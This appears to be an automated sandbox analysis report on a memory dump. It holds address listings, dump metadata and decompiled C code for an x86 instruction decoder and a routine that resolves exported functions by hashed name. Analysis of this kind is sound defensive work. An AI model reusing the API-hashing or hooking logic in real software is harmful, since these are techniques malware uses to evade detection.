0x6f328b12
0x6f328b26
0x6f328b48
0x6f328b4d
0x6f328b4d
0x6f32874b
0x6f328750
0x6f328754
0x6f328754
0x6f328754
0x6f328754
0x6f328759
0x6f32875e
0x6f328760
0x6f328764
0x6f32876b
0x6f328770
0x6f328772
0x6f328ad3
0x6f328ae2
0x6f328afb
0x6f328b00
0x6f328b00
0x6f328785
0x6f32878a
0x6f32878e
0x6f32878e
0x6f32878e
0x6f3287a0
0x6f3287c1
0x6f3287c9
0x6f3287d7
0x6f3287f5
0x6f3287fb
0x6f3287fb
0x00000000
0x6f32870c
0x6f3285a4
0x6f3285a4
0x6f3285a6
0x6f3285ad
0x6f3285bb
0x6f3285bd
0x6f3285c1
0x6f3285c3
0x6f3285c5
0x6f328600
0x6f32860f
0x6f328611
0x6f328613
0x6f328631
0x6f328633
0x6f328635
0x6f328647
0x6f328665
0x6f32866e
0x6f328671
0x6f32867f
0x6f328690
0x6f3286ae
0x6f3286b0
0x6f3286b4
0x6f3286b4
0x6f3286b4
0x6f328635
0x00000000
0x6f328613
0x6f3285cb
0x6f3285cb
0x6f3285d0
0x6f3285d7
0x6f3285e6
0x6f3285ed
0x6f3285ef
0x00000000
0x00000000
0x6f3285fb
0x6f3285fc
0x6f3285fe
0x00000000
0x00000000
0x00000000
0x6f3285fe
0x6f3285f1
0x6f3285f4
0x00000000
0x00000000
0x6f3286b6
0x6f3286b6
0x6f3286b7
0x6f3286b7
0x00000000
0x6f328497
0x6f328497
0x6f328497
0x6f328499
0x6f3284a0
0x6f3284ae
0x6f3284b0
0x6f3284b4
0x6f3284b6
0x6f3284e2
0x6f3284e6
0x6f3284eb
0x6f3284f0
0x6f3284f4
0x6f3284f8
0x6f3284ff
0x6f328504
0x6f328506
0x6f328a95
0x6f328aa4
0x6f328ac3
0x6f328ac8
0x6f328ac8
0x6f328519
0x6f32851e
0x6f328522
0x6f328522
0x6f328522
0x6f328533
0x6f328535
0x6f328537
0x6f328548
0x6f328548
0x6f32854d
0x6f328552
0x6f328556
0x6f32855b
0x6f328562
0x6f328567
0x6f328569
0x6f328a57
0x6f328a63
0x6f328a7d
0x6f328a82
0x6f328a82
0x6f32857f
0x6f328584
0x6f328588
0x6f328588
0x6f328588
0x6f328588
0x6f32858b
0x6f32858b
0x00000000
0x6f32858b
0x6f3284ba
0x6f3284ba
0x6f3284bc
0x6f3284c8
0x6f3284cf
0x6f3284d1
0x00000000
0x00000000
0x6f3284dd
0x6f3284de
0x6f3284e0
0x00000000
0x00000000
0x00000000
0x6f3284e0
0x6f3284d3
0x6f3284d6
0x00000000
0x00000000
0x6f32858c
0x6f328590
0x6f328591
0x6f328591
0x00000000
0x6f328499
0x6f328491

Strings

, xrefs: 6F328A1A

Memory Dump Source

Source File: 00000000.00000002.874060553.000000006F321000.00000020.00020000.sdmp, Offset: 6F320000, based on PE: true

Associated: 00000000.00000002.874049018.000000006F320000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.874103969.000000006F33A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.874116574.000000006F33D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.874127686.000000006F33F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 6ef57238032d434573a229406e5b3f471aaa2c466f36d27769f972841248c63e
Instruction ID: 1dd73a1845844a53c3d7a4b15f26cd047ee3a8c0ae486bbe125dd4bf8a8cfb10
Opcode Fuzzy Hash: 6ef57238032d434573a229406e5b3f471aaa2c466f36d27769f972841248c63e
Instruction Fuzzy Hash: 10126A716083459FC714EF34C980A6EB7E5EF85708F108A2EE699872E1EB70ED05CB52

Uniqueness

Uniqueness Score: -1.00%

Function 6F339370, Relevance: 1.8, Strings: 1, Instructions: 529
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E6F339370(intOrPtr __ecx, intOrPtr __edx, void* __eflags) {
				signed int _t250;
				signed char _t251;
				signed char* _t254;
				char _t255;
				signed short _t256;
				char _t257;
				signed short _t260;
				signed int _t261;
				signed int _t262;
				void* _t264;
				void* _t272;
				void* _t273;
				signed short* _t274;
				signed char _t275;
				signed int _t277;
				signed int _t278;
				void* _t282;
				signed int _t288;
				unsigned int _t290;
				signed int _t292;
				signed int _t293;
				signed int _t294;
				signed int _t295;
				unsigned int _t296;
				unsigned int _t297;
				signed int _t299;
				unsigned int _t301;
				signed char _t302;
				signed int _t304;
				signed char _t307;
				signed char _t308;
				signed int _t309;
				void* _t312;
				void* _t313;
				signed int _t314;
				signed int _t316;
				signed int _t319;
				signed int _t321;
				signed int _t338;
				signed int _t339;
				signed int _t343;
				signed int _t345;
				unsigned int* _t346;
				unsigned int _t354;
				signed int _t355;
				void* _t357;
				signed int _t364;
				signed int _t366;
				signed int _t383;
				signed int _t388;
				signed int _t391;
				signed int _t395;
				signed int _t396;
				signed int _t397;
				signed int _t398;
				signed int _t399;
				signed int _t400;
				signed int _t403;
				signed int _t408;
				signed int _t411;
				signed int _t412;
				signed int _t413;
				signed int _t417;
				signed int _t419;
				signed int _t424;
				void* _t426;
				signed int* _t427;

				 *((intOrPtr*)(_t426 + 0x24)) = __edx;
				 *((intOrPtr*)(_t426 + 0x10)) = __ecx;
				 *((intOrPtr*)(_t426 + 0x14)) = __ecx;
				_t274 =  *(_t426 + 0x48);
				E6F333698( *(_t426 + 0x48), 0, 0x1c);
				_t427 = _t426 + 0xc;
				_t338 = 0;
				_t282 = 0x10;
				do {
					_t250 =  *_t274 & 0x000000ff;
					_t274 =  &(_t274[0]);
					if(_t250 == 0xf3) {
						_t383 = _t427[0x10];
						_t339 = _t338 | 0x00000004;
						L17:
						_t338 = _t339 & 0x000000ff;
						 *(_t383 + 1) = _t250;
						goto L18;
					}
					if(_t250 == 0xf2) {
						_t383 = _t427[0x10];
						_t339 = _t338 | 0x00000002;
						goto L17;
					}
					if(_t250 == 0xf0) {
						_t338 = (_t338 | 0x00000020) & 0x000000ff;
						 *(_t427[0x10] + 2) = _t250;
						goto L18;
					}
					if(_t250 == 0x26 || _t250 == 0x2e || _t250 == 0x36 || _t250 == 0x3e) {
						L13:
						_t338 = (_t338 | 0x00000040) & 0x000000ff;
						 *(_t427[0x10] + 3) = _t250;
					} else {
						_t6 = _t250 - 0x64; // -100
						if(_t6 <= 1) {
							goto L13;
						}
						if(_t250 == 0x66) {
							_t338 = (_t338 | 0x00000008) & 0x000000ff;
							 *(_t427[0x10] + 4) = _t250;
							goto L18;
						}
						if(_t250 != 0x67) {
							break;
						} else {
							_t338 = _t338 | 0x00000010;
							 *(_t427[0x10] + 5) = _t250;
							goto L18;
						}
					}
					L18:
					_t282 = _t282 + 0xff;
				} while (_t282 != 0);
				_t388 = _t427[0x10];
				_t285 =  !=  ? _t338 : 1;
				_t343 = _t338 << 0x17;
				 *(_t388 + 6) = _t250;
				 *_t427 =  !=  ? _t338 : 1;
				 *(_t388 + 0x18) = _t343;
				if(_t250 == 0xf) {
					_t250 =  *_t274 & 0x000000ff;
					_t274 =  &(_t274[0]);
					_t427[5] = _t250;
					 *(_t427[0x10] + 7) = _t250;
					_t427[2] = _t427[4] + 0x4a;
				} else {
					_t22 = _t250 - 0xa0; // -160
					_t427[5] =  *(_t427[0x10] + 7) & 0x000000ff;
					if(_t22 <= 3) {
						_t424 =  *_t427;
						_t382 =  !=  ? (_t424 | 0x00000008) & 0x000000ff : _t424 & 0x000000f7;
						 *_t427 =  !=  ? (_t424 | 0x00000008) & 0x000000ff : _t424 & 0x000000f7;
					}
				}
				_t354 = _t250 >> 2;
				_t391 = _t250 & 0x00000003;
				_t345 = _t427[2];
				_t427[3] = _t391;
				_t427[6] = _t354;
				_t288 =  *(( *(_t354 + _t345) & 0x000000ff) + _t391 + _t345) & 0x000000ff;
				_t427[1] = _t288;
				if(_t288 == 0xff) {
					_t343 = _t343 + 0x3000;
					_t288 = 0 | (_t250 & 0xfffffffd) == 0x00000024;
					 *(_t427[0x10] + 0x18) = _t343;
					_t427[1] = _t288;
				}
				if((_t427[1] & 0x00000080) != 0) {
					_t290 =  *((_t288 & 0x0000007f) + _t345) & 0x0000ffff;
					_t427[1] = _t290;
					_t395 = _t290 >> 8;
				} else {
					_t395 = 0;
				}
				if(_t427[5] != 0 && ( *_t427 &  *(( *(_t427[6] + _t427[4] + 0x130) & 0x000000ff) + _t427[3] + _t427[4] + 0x130) & 0x000000ff) != 0) {
					_t343 = _t343 | 0x00003000;
					 *(_t427[0x10] + 0x18) = _t343;
				}
				if((_t427[1] & 0x00000001) == 0) {
					if(( *_t427 & 0x00000020) != 0) {
						_t343 = _t343 | 0x00009000;
						 *(_t427[0x10] + 0x18) = _t343;
					}
					goto L114;
				} else {
					_t355 = _t427[0x10];
					_t343 = _t343 | 0x00000001;
					 *(_t355 + 0x18) = _t343;
					_t296 =  *_t274 & 0x000000ff;
					_t346 =  &(_t427[6]);
					 *_t346 = _t296;
					 *(_t355 + 8) = _t296;
					_t297 = _t296 >> 6;
					_t427[3] = _t297;
					 *(_t355 + 9) = _t297;
					_t299 =  *_t346 & 0x00000007;
					_t427[7] = _t299;
					 *(_t355 + 0xb) = _t299;
					_t301 =  *_t346 & 0x0000003f;
					 *_t346 = _t301;
					_t302 = _t301 >> 3;
					_t427[2] = _t302;
					 *(_t355 + 0xa) = _t302;
					if(_t395 != 0 && (_t395 << _t302 & 0x00000080) != 0) {
						_t343 = _t343 | 0x00003000;
						 *(_t427[0x10] + 0x18) = _t343;
					}
					if(_t427[5] == 0) {
						_t80 = _t250 - 0xd9; // -217
						if(_t80 <= 6) {
							_t81 = _t250 + 0x27; // 0x27
							_t417 = _t81 & 0x000000ff;
							if(_t427[3] != 3) {
								_t419 = ( *(_t417 + _t427[4] + 0xf1) & 0x000000ff) << _t427[2];
							} else {
								_t419 = ( *(_t427[4] + _t427[2] + 0xf8 + _t417 * 8) & 0x000000ff) << _t427[7];
							}
							if((_t419 & 0x00000080) != 0) {
								_t343 = _t343 | 0x00003000;
								 *(_t427[0x10] + 0x18) = _t343;
							}
						}
					}
					if(( *_t427 & 0x00000020) == 0) {
						L52:
						if(_t427[5] == 0) {
							if(_t250 == 0x8c) {
								L85:
								if(_t427[2] <= 5) {
									L87:
									_t427[5] = _t274[0];
									_t427[4] =  &(_t274[1]);
									if(_t427[2] <= 1) {
										if(_t250 != 0xf6) {
											_t309 = _t427[1];
											_t310 =  ==  ? _t309 | 0xffffff90 : _t309;
											_t427[1] =  ==  ? _t309 | 0xffffff90 : _t309;
										} else {
											_t427[1] = _t427[1] | 0xffffff82;
										}
									}
									if(_t427[3] == 0) {
										if(( *_t427 & 0x00000010) == 0) {
											_t264 = 4;
											_t357 =  ==  ? _t264 : 0;
										} else {
											_t273 = 2;
											_t357 =  ==  ? _t273 : 0;
										}
									} else {
										if(_t427[3] == 1) {
											_t357 = 1;
										} else {
											if(_t427[3] == 2) {
												_t357 = (( !( *_t427) & 0x00000010) >> 3) + 2;
											} else {
												_t357 = 0;
											}
										}
									}
									if(_t427[3] != 3 && _t427[7] == 4 && ( *_t427 & 0x00000010) == 0) {
										_t307 = _t427[5];
										_t343 = _t343 | 0x00000002;
										_t403 = _t427[0x10];
										_t427[4] =  &(_t274[1]);
										 *(_t403 + 0xc) = _t307;
										_t308 = _t307 & 0x00000007;
										 *(_t403 + 0x18) = _t343;
										 *(_t403 + 0xd) = _t307 >> 6;
										 *(_t403 + 0xe) = (_t307 & 0x0000003f) >> 3;
										 *(_t403 + 0xf) = _t308;
										if(_t308 == 5) {
											_t272 = 4;
											_t357 =  ==  ? _t272 : _t357;
										}
									}
									if(_t357 == 1) {
										_t304 = _t427[0x10];
										_t343 = _t343 | 0x00000020;
										 *(_t304 + 0x18) = _t343;
										 *((char*)(_t304 + 0x14)) =  *(_t427[4] - 1);
									} else {
										if(_t357 == 2) {
											_t277 = _t427[0x10];
											_t343 = _t343 | 0x00000040;
											 *(_t277 + 0x18) = _t343;
											 *((short*)(_t277 + 0x14)) =  *(_t427[4] - 1) & 0x0000ffff;
										} else {
											if(_t357 == 4) {
												_t278 = _t427[0x10];
												_t343 = _t343 | 0x00000080;
												 *(_t278 + 0x18) = _t343;
												 *(_t278 + 0x14) =  *(_t427[4] - 1);
											}
										}
									}
									_t195 = _t427[4] - 1; // -1
									_t274 = _t357 + _t195;
									L114:
									_t251 = _t427[1];
									_t292 = _t251 & 0x00000040;
									if((_t251 & 0x00000010) == 0) {
										L121:
										if((_t427[1] & 0x00000004) == 0) {
											L129:
											if((_t427[1] & 0x00000002) != 0) {
												_t396 = _t427[0x10];
												_t343 = _t343 | 0x00000004;
												 *(_t396 + 0x18) = _t343;
												_t257 =  *_t274;
												_t274 =  &(_t274[0]);
												 *((char*)(_t396 + 0x10)) = _t257;
											}
											if(_t292 == 0) {
												if((_t427[1] & 0x00000020) != 0) {
													_t293 = _t427[0x10];
													_t343 = _t343 | 0x00000104;
													 *(_t293 + 0x18) = _t343;
													_t255 =  *_t274;
													_t274 =  &(_t274[0]);
													 *((char*)(_t293 + 0x10)) = _t255;
												}
												goto L135;
											} else {
												L132:
												_t294 = _t427[0x10];
												_t343 = _t343 | 0x00000110;
												 *(_t294 + 0x18) = _t343;
												_t256 =  *_t274;
												_t274 =  &(_t274[2]);
												 *(_t294 + 0x10) = _t256;
												L135:
												_t275 = _t274 - _t427[0xf];
												if(_t275 <= 0xf) {
													 *(_t427[0x10]) = _t275;
												} else {
													_t254 = _t427[0x10];
													_t275 = 0xf;
													_t254[0x18] = _t343 | 0x00005000;
													 *_t254 = _t275;
												}
												return _t275 & 0x000000ff;
											}
										}
										if((_t343 & 0x00000010) == 0) {
											if((_t343 & 0x00000008) == 0) {
												_t397 = _t427[0x10];
												_t343 = _t343 | 0x00000008;
												 *(_t397 + 0x18) = _t343;
												 *((short*)(_t397 + 0x10)) =  *_t274 & 0x0000ffff;
												L128:
												_t274 =  &(_t274[1]);
												goto L129;
											}
											_t398 = _t427[0x10];
											_t343 = _t343 | 0x00000800;
											L126:
											 *(_t398 + 0x18) = _t343;
											 *((short*)(_t398 + 0x14)) =  *_t274 & 0x0000ffff;
											goto L128;
										}
										_t398 = _t427[0x10];
										_t343 = _t343 | 0x00000008;
										goto L126;
									}
									if(_t292 == 0) {
										if(( *_t427 & 0x00000008) == 0) {
											_t399 = _t427[0x10];
											_t343 = _t343 | 0x00000010;
											 *(_t399 + 0x18) = _t343;
											_t260 =  *_t274;
											_t274 =  &(_t274[2]);
											 *(_t399 + 0x10) = _t260;
										} else {
											_t400 = _t427[0x10];
											_t343 = _t343 | 0x00000008;
											 *(_t400 + 0x18) = _t343;
											_t261 =  *_t274 & 0x0000ffff;
											_t274 =  &(_t274[1]);
											 *(_t400 + 0x10) = _t261;
										}
										goto L121;
									}
									if(( *_t427 & 0x00000008) == 0) {
										goto L132;
									}
									_t295 = _t427[0x10];
									_t343 = _t343 | 0x00000108;
									 *(_t295 + 0x18) = _t343;
									_t262 =  *_t274 & 0x0000ffff;
									_t274 =  &(_t274[1]);
									 *(_t295 + 0x10) = _t262;
									goto L135;
								}
								L86:
								_t343 = _t343 | 0x00011000;
								 *(_t427[0x10] + 0x18) = _t343;
								goto L87;
							}
							if(_t250 != 0x8e) {
								L66:
								if(_t427[3] != 3) {
									if(_t427[5] == 0) {
										goto L87;
									}
									if(_t250 == 0xd7 || _t250 == 0xf7) {
										L83:
										if(( *_t427 & 0x00000009) != 0) {
											goto L86;
										}
									} else {
										if(_t250 == 0xd6) {
											if(( *_t427 & 0x00000006) != 0) {
												goto L86;
											}
											goto L87;
										}
										if(_t250 == 0xc5) {
											goto L86;
										}
										if(_t250 == 0x50) {
											goto L83;
										}
									}
									goto L87;
								}
								_t364 = _t427[4];
								_t312 = _t364 + 0x1da;
								_t366 =  !=  ? _t312 : _t364 + 0x1cb;
								_t313 =  !=  ? _t427[9] + _t364 : _t312;
								_t427[4] = _t366;
								if(_t366 == _t313) {
									goto L87;
								} else {
									goto L68;
								}
								while(1) {
									L68:
									_t408 = _t427[4];
									if(_t250 ==  *_t408) {
										break;
									}
									_t411 = _t408 + 3;
									_t427[4] = _t411;
									if(_t411 != _t313) {
										continue;
									}
									goto L87;
								}
								_t314 = _t408;
								if(( *_t427 &  *(_t314 + 1) & 0x000000ff) == 0) {
									goto L87;
								}
								if((( *(_t314 + 2) & 0x000000ff) << _t427[2] & 0x00000080) == 0) {
									goto L86;
								}
								goto L87;
							}
							if(_t427[2] == 1) {
								goto L86;
							}
							goto L85;
						}
						if(_t250 == 0x20 || _t250 == 0x22) {
							_t316 = 3;
							_t427[3] = _t316;
							if(_t427[2] > 4 || _t427[2] == 1) {
								goto L86;
							} else {
								goto L87;
							}
						} else {
							if(_t250 == 0x21 || _t250 == 0x23) {
								_t319 = 3;
								_t427[3] = _t319;
								if((_t427[6] & 0xfffffff0) == 0x20) {
									goto L86;
								}
								goto L87;
							} else {
								goto L66;
							}
						}
					}
					if(_t427[3] == 3) {
						L51:
						_t343 = _t343 | 0x00009000;
						 *(_t427[0x10] + 0x18) = _t343;
						goto L52;
					}
					_t412 = _t427[4];
					_t321 = _t250;
					_t427[8] = _t412 + 0x1b9;
					if(_t427[5] == 0) {
						_t413 = _t412 + 0x1a1;
						_t321 = _t250 & 0x000000fe;
					} else {
						_t413 = _t427[8];
						_t427[8] = _t412 + 0x1cb;
					}
					while(_t413 != _t427[8]) {
						if(_t321 ==  *_t413) {
							if((( *(_t413 + 1) & 0x000000ff) << _t427[2] & 0x00000080) == 0) {
								goto L52;
							}
							goto L51;
						}
						_t413 = _t413 + 2;
					}
					goto L51;
				}
			}

0x6f339377
0x6f33937b
0x6f339387
0x6f33938b
0x6f33938f
0x6f339394
0x6f339397
0x6f339399
0x6f33939b
0x6f33939b
0x6f33939e
0x6f3393a4
0x6f33941c
0x6f339420
0x6f339423
0x6f339423
0x6f339426
0x00000000
0x6f339426
0x6f3393ab
0x6f339413
0x6f339417
0x00000000
0x6f339417
0x6f3393b2
0x6f33940b
0x6f33940e
0x00000000
0x6f33940e
0x6f3393b7
0x6f3393f5
0x6f3393fc
0x6f3393ff
0x6f3393c8
0x6f3393c8
0x6f3393ce
0x00000000
0x00000000
0x6f3393d3
0x6f3393ed
0x6f3393f0
0x00000000
0x6f3393f0
0x6f3393d8
0x00000000
0x6f3393da
0x6f3393de
0x6f3393e1
0x00000000
0x6f3393e1
0x6f3393d8
0x6f339429
0x6f339429
0x6f339429
0x6f339432
0x6f33943b
0x6f33943e
0x6f339441
0x6f339444
0x6f339447
0x6f33944d
0x6f33948f
0x6f339492
0x6f339493
0x6f33949a
0x6f33949d
0x6f33944f
0x6f339453
0x6f33945d
0x6f339464
0x6f339466
0x6f33947f
0x6f339482
0x6f339482
0x6f339464
0x6f3394a5
0x6f3394a8
0x6f3394ab
0x6f3394af
0x6f3394b3
0x6f3394bd
0x6f3394c1
0x6f3394cb
0x6f3394d4
0x6f3394e1
0x6f3394e4
0x6f3394e7
0x6f3394e7
0x6f3394f3
0x6f3394fe
0x6f339504
0x6f339508
0x6f3394f5
0x6f3394f5
0x6f3394f5
0x6f339510
0x6f33953a
0x6f339540
0x6f339540
0x6f339548
0x6f3398f1
0x6f3398f7
0x6f3398fd
0x6f3398fd
0x00000000
0x6f33954e
0x6f33954e
0x6f339552
0x6f339555
0x6f339558
0x6f33955b
0x6f33955f
0x6f339561
0x6f339564
0x6f339567
0x6f33956b
0x6f339570
0x6f339573
0x6f339577
0x6f33957c
0x6f33957f
0x6f339581
0x6f339584
0x6f339588
0x6f33958d
0x6f33959d
0x6f3395a3
0x6f3395a3
0x6f3395ab
0x6f3395ad
0x6f3395b6
0x6f3395b8
0x6f3395bb
0x6f3395c6
0x6f3395f3
0x6f3395c8
0x6f3395df
0x6f3395df
0x6f3395fb
0x6f339601
0x6f339607
0x6f339607
0x6f3395fb
0x6f3395b6
0x6f33960e
0x6f33967f
0x6f339684
0x6f3396dd
0x6f33979f
0x6f3397a4
0x6f3397b3
0x6f3397b9
0x6f3397bd
0x6f3397c6
0x6f3397cd
0x6f3397d6
0x6f3397e4
0x6f3397e7
0x6f3397cf
0x6f3397cf
0x6f3397cf
0x6f3397cd
0x6f3397f0
0x6f33981d
0x6f339830
0x6f339838
0x6f33981f
0x6f339821
0x6f339829
0x6f339829
0x6f3397f2
0x6f3397f7
0x6f339816
0x6f3397f9
0x6f3397fe
0x6f33980f
0x6f339800
0x6f339800
0x6f339800
0x6f3397fe
0x6f3397f7
0x6f339840
0x6f33984f
0x6f33985c
0x6f339865
0x6f339869
0x6f33986d
0x6f339870
0x6f339873
0x6f339876
0x6f339879
0x6f33987c
0x6f339882
0x6f339886
0x6f33988c
0x6f33988c
0x6f339882
0x6f339892
0x6f3398cf
0x6f3398d3
0x6f3398da
0x6f3398e0
0x6f339894
0x6f339897
0x6f3398b7
0x6f3398bb
0x6f3398c2
0x6f3398c9
0x6f339899
0x6f33989c
0x6f33989e
0x6f3398a2
0x6f3398ac
0x6f3398b2
0x6f3398b2
0x6f33989c
0x6f339897
0x6f3398e7
0x6f3398e7
0x6f339900
0x6f339900
0x6f339906
0x6f33990b
0x6f339965
0x6f33996a
0x6f3399a9
0x6f3399ae
0x6f3399b0
0x6f3399b4
0x6f3399b7
0x6f3399ba
0x6f3399bc
0x6f3399bd
0x6f3399bd
0x6f3399c2
0x6f3399e0
0x6f3399e2
0x6f3399e6
0x6f3399ec
0x6f3399ef
0x6f3399f1
0x6f3399f2
0x6f3399f2
0x00000000
0x6f3399c4
0x6f3399c4
0x6f3399c4
0x6f3399c8
0x6f3399ce
0x6f3399d1
0x6f3399d3
0x6f3399d6
0x6f3399f5
0x6f3399f5
0x6f3399fc
0x6f339a16
0x6f3399fe
0x6f3399fe
0x6f339a0a
0x6f339a0b
0x6f339a0e
0x6f339a0e
0x6f339a24
0x6f339a24
0x6f3399c2
0x6f33996f
0x6f33997d
0x6f339995
0x6f339999
0x6f33999c
0x6f3399a2
0x6f3399a6
0x6f3399a6
0x00000000
0x6f3399a6
0x6f33997f
0x6f339983
0x6f339989
0x6f339989
0x6f33998f
0x00000000
0x6f33998f
0x6f339971
0x6f339975
0x00000000
0x6f339975
0x6f33990f
0x6f33993b
0x6f339953
0x6f339957
0x6f33995a
0x6f33995d
0x6f33995f
0x6f339962
0x6f33993d
0x6f33993d
0x6f339941
0x6f339944
0x6f339947
0x6f33994a
0x6f33994d
0x6f33994d
0x00000000
0x6f33993b
0x6f339915
0x00000000
0x00000000
0x6f33991b
0x6f33991f
0x6f339925
0x6f339928
0x6f33992b
0x6f33992e
0x00000000
0x6f33992e
0x6f3397a6
0x6f3397aa
0x6f3397b0
0x00000000
0x6f3397b0
0x6f3396e8
0x6f3396fa
0x6f3396ff
0x6f33976a
0x00000000
0x00000000
0x6f339771
0x6f339797
0x6f33979b
0x00000000
0x00000000
0x6f33977a
0x6f33977f
0x6f339793
0x00000000
0x00000000
0x00000000
0x6f339795
0x6f339786
0x00000000
0x00000000
0x6f33978b
0x00000000
0x00000000
0x6f33978d
0x00000000
0x6f339771
0x6f339701
0x6f33970b
0x6f33971c
0x6f33971f
0x6f339722
0x6f339728
0x00000000
0x00000000
0x00000000
0x00000000
0x6f33972e
0x6f33972e
0x6f33972e
0x6f339735
0x00000000
0x00000000
0x6f339737
0x6f33973a
0x6f339740
0x00000000
0x00000000
0x00000000
0x6f339742
0x6f339744
0x6f33974d
0x00000000
0x00000000
0x6f339761
0x00000000
0x00000000
0x00000000
0x6f339763
0x6f3396ef
0x00000000
0x00000000
0x00000000
0x6f3396f5
0x6f339689
0x6f3396b8
0x6f3396b9
0x6f3396c2
0x00000000
0x6f3396d3
0x00000000
0x6f3396d3
0x6f339690
0x6f339693
0x6f3396a6
0x6f3396a7
0x6f3396ab
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6f339693
0x6f339689
0x6f339615
0x6f339672
0x6f339676
0x6f33967c
0x00000000
0x6f33967c
0x6f339617
0x6f33961b
0x6f339628
0x6f33962c
0x6f339642
0x6f33964a
0x6f33962e
0x6f339630
0x6f33963a
0x6f33963a
0x6f339650
0x6f339659
0x6f339670
0x00000000
0x00000000
0x00000000
0x6f339670
0x6f33965b
0x6f33965b
0x00000000
0x6f339650

Strings

, xrefs: 6F3399DB

Memory Dump Source

Source File: 00000000.00000002.874060553.000000006F321000.00000020.00020000.sdmp, Offset: 6F320000, based on PE: true

Associated: 00000000.00000002.874049018.000000006F320000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.874103969.000000006F33A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.874116574.000000006F33D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.874127686.000000006F33F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 407fd4848e5b307e07d906eea16bb6147e298fc8bb87a15a6d3895badca8086c
Instruction ID: 69edfbabb9f3d940563de12a690adb1a450ced26e0f54c680dfc02319d9c0693
Opcode Fuzzy Hash: 407fd4848e5b307e07d906eea16bb6147e298fc8bb87a15a6d3895badca8086c
Instruction Fuzzy Hash: 0522C93280E3E5CBD714CF15C49136AB7E2BF96310F00896EE8D54B299DB36E945CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6F33143C, Relevance: .6, Instructions: 572
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E6F33143C(signed char __eax, signed char __edx) {
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed char _t231;
				signed char _t233;
				signed char _t238;
				intOrPtr _t241;
				void* _t246;
				signed char _t257;
				signed char _t261;
				signed char _t269;
				signed char _t270;
				signed char _t277;
				signed int _t279;
				signed char _t280;
				signed char _t281;
				void* _t289;
				void* _t290;
				signed char _t315;
				void* _t319;
				signed char _t334;
				signed char _t336;
				void* _t341;
				void* _t347;
				intOrPtr _t352;
				signed char _t354;
				signed char _t363;
				void* _t369;
				intOrPtr _t371;
				signed short* _t373;
				void _t375;
				void* _t379;
				signed int _t381;
				void* _t382;
				void** _t383;
				void* _t384;
				char* _t387;
				signed char _t395;
				signed char* _t396;
				intOrPtr _t400;
				signed int _t451;
				intOrPtr* _t455;
				signed char _t456;
				signed int _t462;
				void* _t467;
				signed char _t471;
				signed char _t472;
				signed char* _t477;
				signed char _t487;
				signed int _t490;
				intOrPtr* _t496;
				intOrPtr _t497;
				signed char _t498;
				signed char _t499;
				intOrPtr _t500;
				signed char _t508;
				intOrPtr _t510;
				void* _t513;
				signed char _t519;
				intOrPtr* _t524;
				signed char _t525;
				signed char _t526;
				signed char _t527;
				signed char _t529;
				signed char* _t531;
				signed char _t532;
				void* _t533;
				void* _t534;
				signed char* _t535;

				_t535[0x54] = __edx;
				 *_t535 = __eax;
				_t231 = E6F330304(__edx, 1);
				if(_t231 != 0) {
					return _t231;
				}
				_t535[0x2c] = _t231;
				if( *0x6f33d208 == 0 ||  *0x6f33d2e4 != 0) {
					L44:
					if( *_t535 == 0) {
						return 0;
					}
					_t233 =  *_t535;
					_t371 =  *((intOrPtr*)(_t233 + 0x3c));
					_t510 =  *((intOrPtr*)(_t371 + _t233 + 0x78));
					_t535[0x130] =  *((intOrPtr*)(_t371 + _t233 + 0x7c)) + _t510;
					_t524 =  *((intOrPtr*)(_t510 + _t233 + 0x20)) + _t233;
					_t373 =  *((intOrPtr*)(_t510 + _t233 + 0x24)) + _t233;
					if( *((intOrPtr*)(_t510 + _t233 + 0x18)) <= 0) {
						L77:
						 *_t535 = 0;
						_t535[0x2c] = 0;
						L78:
						return  *_t535;
					}
					_t535[0x12c] = 0;
					_t535[0x174] = _t535[0x54] ^ 0xe462d21c;
					do {
						_t467 = 0;
						_t387 =  *_t524 +  *_t535;
						_t238 =  *_t387;
						_t535[0x58] = _t238;
						if(_t238 == 0) {
							L49:
							if(E6F334FFC( &(_t535[0x58]), _t467) == _t535[0x174]) {
								_t535[0x2c] = 0;
								_t241 =  *((intOrPtr*)( *((intOrPtr*)(_t510 +  *_t535 + 0x1c)) +  *_t535 + ( *_t373 & 0x0000ffff) * 4));
								__eflags = _t241 - _t510;
								if(_t241 < _t510) {
									L57:
									_t471 =  *_t535 + _t241;
									__eflags = _t471;
									 *_t535 = _t471;
									_t535[0x2c] = _t471;
									L58:
									__eflags =  *_t535;
									if( *_t535 == 0) {
										goto L78;
									}
									__eflags =  *0x6f33d2f0 |  *0x6f33d2f1;
									if(( *0x6f33d2f0 |  *0x6f33d2f1) == 0) {
										_t525 =  *0x6f33d208; // 0x2931340
										__eflags = _t525;
										if(_t525 == 0) {
											 *0x6f33d2f0 = 1;
											_t526 = E6F33361C(0x1c4);
											__eflags = _t526;
											if(_t526 == 0) {
												_t526 = 0;
												__eflags = 0;
											} else {
												E6F331C30(_t526, 0x10);
												 *(_t526 + 0x1c0) = 0;
											}
											 *0x6f33d208 = _t526;
											 *0x6f33d2f0 = 0;
											L68:
											_t246 = 0;
											_t472 = 0;
											__eflags = 0;
											while(1) {
												__eflags =  *(_t472 + _t526 + 8);
												if( *(_t472 + _t526 + 8) == 0) {
													break;
												}
												_t246 = _t246 + 1;
												_t472 = _t472 + 0x1c;
												__eflags = _t246 - 0x10;
												if(_t246 < 0x10) {
													continue;
												}
												_t375 = E6F33361C(0x1c4);
												__eflags = _t375;
												if(_t375 == 0) {
													_t375 = 0;
													__eflags = 0;
												} else {
													E6F331C30(_t375, 0x10);
													 *(_t375 + 0x1c0) = 0;
												}
												 *(_t375 + 0x14) = _t535[0x2c];
												E6F32DFC0(_t375,  &(_t535[0x58]));
												 *(_t375 + 8) = _t535[0x54];
												 *(_t526 + 0x1c0) = _t375;
												L76:
												 *_t535 = _t535[0x2c];
												goto L78;
											}
